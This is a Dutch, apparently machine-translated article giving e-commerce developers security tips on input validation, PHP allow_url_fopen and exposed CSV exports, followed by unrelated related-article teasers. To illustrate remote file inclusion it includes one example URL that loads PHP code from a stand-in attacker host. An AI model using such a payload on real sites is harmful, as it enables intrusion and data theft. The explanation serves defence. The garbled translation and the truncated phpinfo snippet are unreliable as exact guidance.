Veiligheid in een e-commerce website moet een belangrijke overweging bij het ontwikkelen van een e-commerce website of software. Een ontwikkelaar moet zich bewust zijn van alle overwegingen van veiligheid bij het ontwerpen van een site. Met e-commerce steeds meer gemeengoed deze dagen, is het aantal aanvallen op de veiligheid zeker toe. Paranoia is een gezonde zaak voor e-commerce site ontwikkelaars, moeten we op peil te houden poort met veiligheidskwesties, en houden onze oren en ogen open. Hoewel de volgende lacunes ernstig zijn, de volgende lacunes indien aanwezig zijn makkelijk vast.
Hieronder worden een aantal overwegingen van veiligheid op te nemen bij het ontwikkelen van een site. Dit artikel heeft geen betrekking op e-winkeldiefstal, zie mijn apart artikel hierover.
Input van de gebruiker - elke ingang, of zij een hoeveelheid worden betreden, op zoek naar een product, het invoeren van een naam, enz., moet worden gevalideerd voor verdachte tekens. Als dit niet gebeurt, is het mogelijk om "?>", de sluiting eind tags van PHP en uitvoeren van een PHP-code.
Het is veel veiliger maken van cijfers en letters az (hoofdletters inbegrepen) en 0-9 en niets anders, in plaats van een lijst van alle aard dat er niet zou moeten zijn. De validatie script nodig heeft om te bladeren door elk karakter een voor een. Dit moet worden bereikt door in de server-side validatie, geen Javascript. Met behulp van server-side validatie van invoer is van essentieel belang te houden ongewenste tekens
Er bestaat een ander belangrijk bij het uitvoeren van PHP-code. Bij het gebruik van PHP is er een, de zogenaamde allow_url_fopen die de opening van bestanden maakt van een PHP-script. Deze instelling moet worden uitgeschakeld, tenzij absoluut noodzakelijk.
Stel je hebt PHP scripts voor zowel vaste kop-en voetteksten en toegang tot uw webpagina's die u zou typen in http://www.mysite.com/index.php?page=page2. Allen het neemt is een kwaadwillende gebruiker een script uitgevoerd door een wijziging van deze parameters door te typen in "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" met sommige PHP-code in het bestand "hacker.txt". Je zou iets gebeuren, PHP-bestanden lezen, geschrapt, vitale informatie gestolen.
Als u niet zeker weet of deze instelling is ingeschakeld of uitgeschakeld, kunt u de volgende PHP-code te kopiëren naar een tekstbestand, en deze uploaden naar uw webserver:
phpinfo ();
?>
Wanneer u uw script op uw webserver toegang, moet je tegenkomt de instelling allow_url_fopen onder configuratie.
Een computer gebruiker, onder normale omstandigheden niet kan vinden de waarde van deze instelling.
Wees voorzichtig van geëxporteerde gegevens zoals bestellingen, producten en mySQL in CSV-bestanden. Als deze gegevens wordt uitgevoerd uit een script en wordt gehouden op de webserver onder een gemeenschappelijke bestandsnaam dwz. http://www.mysite.com/admin/output_tables.csv. Dit is pas echt een probleem wanneer de geëxporteerde gegevens woont in een bestand in een map die openbaar toegankelijk is. Er zijn twee manieren om deze lacune in de beveiliging te voorkomen - eerst de output file achter een wachtwoord beschermde map, ten tweede hebben de gegevens zich in een HTML-formulier textarea element op een script. De winkelier kan dan kopieer deze informatie van het tekstbestand en maak een nieuw bestand op hun computer en plak de informatie hier.
Allen het neemt is een hacker om deze bestandsnaam vinden door het controleren van de e-commerce software demo's website en zoek naar dezelfde bestandsnaam op een echte site.
Hieronder zijn meer artikelen met betrekking tot het bovengenoemde artikel van de "E-commerce" artikel categorie.
Mensen die geïnteresseerd zijn in het bovenstaande artikel "E-commerce Beveiliging - inpluggen de Veiligheidsraad Holes" zijn ook geïnteresseerd in de gerelateerde artikelen hieronder opgesomd:
Running een e-commerce is niet alleen over het houden van uw website up and running. Klanten vertrouwen op uw vermogen om hen te dienen via telefoon, fax, e-mail, of andere middelen, en het vereist dat alle van uw systemen te werken om te kunnen aanvragen van klanten te voldoen.
Gewoon een paar dagen terug had ik een gesprek met mijn vriend. Hij viert zijn 1ste verjaardag baby's en moest lopen tussen zijn geboorteland in Kerala en Chennai, zijn werkplaats. Hij en zijn betere helft reisde tussen deze plaatsen ten minste 4 keer in de laatste een maand.
Als u e-commerce gedaan voor een bedrag van tijd, zou je geweten hebben dat er meer scamers dan echte aanbieders van wholesale-diensten Dropship directory. In de wereld van e-business, Salehoo en Worldwide Merken zijn zowel gerenommeerde dienstverleners die steeds populairder geworden in de afgelopen jaren.
Als u ooit een online winkel is, hebt u waarschijnlijk al hebt gehoord over Salehoo of zelfs gebruikte het in uw voordeel. Als je net begint met uw bedrijf, kunt u worden verward met de gemengde Salehoo reviews die er zijn. Nu, laten we eens kijken naar wat Salehoo is echt alles over en de diensten die zij aanbieden die veel de neiging om over het hoofd.
Hoeveel mensen kent u die iets online gekocht? Als je zoals ik nogal wat, dat is waarom e-commerce is een nieuwe online de wereld winkelcentrum. Maar wie loopt deze online winkels? Mensen zoals u en ik, dat is waarom deze business is booming en zal blijven nu giek en tot ver in de toekomst.
Als je een grote fan van de nieuwste elektronische producten, kunt u verleiden door het idee van het runnen van uw eigen elektronica-online bedrijf. Het is niet zo moeilijk om te beginnen wanneer u de volledige voordeel van het recht daling scheepvaart elektronica dienst en er zijn genoeg voor u om uit te kiezen.
Heb je wel eens in je lokale supermarkt en vraag me af hoe het zou zijn als je het in handen? Wilt u een goede eigenaar, zullen de mensen zoals u? Nou dit artikel zal u de voordelen van het bezitten van uw eigen online winkel, of algemeen bekend als e-commerce dat afwijkt van een echte lokale supermarkt.
